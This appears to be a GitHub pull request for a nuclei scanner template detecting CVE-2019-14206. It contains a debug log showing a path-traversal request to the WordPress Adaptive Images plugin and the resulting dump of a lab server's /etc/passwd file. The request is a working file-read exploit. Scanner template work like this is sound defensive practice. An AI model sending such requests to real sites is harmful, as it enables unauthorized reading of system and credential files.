Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
PR Information
/claim #14693
Template validation
debug
└─$ nuclei -t 1.yaml -u http://192.168.1.32/wordpress -debug __ _ ____ __ _______/ /__ (_) / __ \/ / / / ___/ / _ \/ / / / / / /_/ / /__/ / __/ / /_/ /_/\__,_/\___/_/\___/_/ v3.4.10 projectdiscovery.io [INF] Current nuclei version: v3.4.10 (outdated) [INF] Current nuclei-templates version: v10.3.6 (latest) [WRN] Scan results upload to cloud is disabled. [INF] New templates added in latest release: 176 [INF] Templates loaded for current scan: 1 [WRN] Loading 1 unsigned templates for scan. Use with caution. [INF] Targets loaded for current scan: 1 [INF] [CVE-2019-14206] Dumped HTTP request for http://192.168.1.32/wordpress/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings%5Bsource_file%5D=/etc/passwd GET /wordpress/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings%5Bsource_file%5D=/etc/passwd HTTP/1.1 Host: 192.168.1.32 User-Agent: nuclei Accept: */* Connection: close Accept-Encoding: gzip [DBG] [CVE-2019-14206] Dumped HTTP response http://192.168.1.32/wordpress/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings%5Bsource_file%5D=/etc/passwd HTTP/1.1 200 OK Connection: close Content-Length: 1728 Content-Type: image/jpeg Date: Sun, 04 Jan 2026 03:51:19 GMT Last-Modified: Sat, 27 Sep 2025 07:29:23 GMT Server: Apache/2.4.56 (Debian) root:x:0:0:root:/root:/usr/bin/zsh daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:109::/nonexistent:/usr/sbin/nologin systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin armour:x:1000:1000:Armour,,,:/home/armour:/usr/bin/zsh systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin mysql:x:106:113:MySQL Server,,,:/var/lib/mysql:/bin/false docker-registry:x:107:114:Docker Registry,,,:/var/lib/docker-registry:/usr/sbin/nologin postgres:x:108:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash ftp:x:109:117:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin redis:x:110:118::/var/lib/redis:/usr/sbin/nologin [CVE-2019-14206:status-1] [http] [high] http://192.168.1.32/wordpress/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings%5Bsource_file%5D=/etc/passwd [CVE-2019-14206:word-2] [http] [high] http://192.168.1.32/wordpress/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings%5Bsource_file%5D=/etc/passwd [CVE-2019-14206:regex-3] [http] [high] http://192.168.1.32/wordpress/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings%5Bsource_file%5D=/etc/passwd [INF] Scan completed in 11.553628ms. 3 matches found.Additional Details (leave it blank if not applicable)
Additional References: